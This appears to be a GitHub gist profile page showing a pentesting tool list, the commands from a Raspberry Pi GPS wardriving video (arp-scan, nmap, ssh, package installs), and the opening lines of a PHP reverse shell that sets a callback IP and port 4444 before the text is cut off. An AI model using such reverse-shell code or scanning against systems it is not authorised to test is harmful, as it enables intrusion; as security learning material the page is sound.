Skip to content

Instantly share code, notes, and snippets.

View Soulsender's full-sized avatar
💭
I don't like to spam commits but it sure feels like that some days

Soulsender Soulsender

💭
I don't like to spam commits but it sure feels like that some days
View GitHub Profile
@Soulsender
Soulsender / Tool List
Last active December 16, 2022 22:51
Tool List
WEB & ENUMERATION
nikto - General Web Scan
SQLMap - SQL Injection Mapper
Gobuster - Subdomain & Directory bruteforcer
Sublist3r - Subdomain Lister
OWASP Amass - Improved Subdomain Lister
WhatWeb - Technology Identifier
Wappalyzer - Technology Identifier Extension
builtwith.com - In-Depth Technology Identifer
dirbuster - Directory Bruteforcer
@Soulsender
Soulsender / commands.txt
Last active March 10, 2023 20:36
A list of commands used in the gps wardriving video. THESE WILL BE DIFFERENT FOR YOU BASED ON THINGS LIKE YOUR INTERFACE NAME AND IP ADDRESS.
GETTING THE IP
arp-scan --interface=wlan0 --localnet
nmap -sN 192.168.0.1/24
SSH
ssh username@192.168.0.1
INSTALLING TOOLS
sudo apt update
sudo apt install hostapd dnsmasq gpsd gpsd-clients netcat git raspberrypi-kernel-headers
<?php
$ip = '127.0.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
set_time_limit (0);
$VERSION = "1.0";
$chunk_size = 1400;
$write_a = null;
$error_a = null;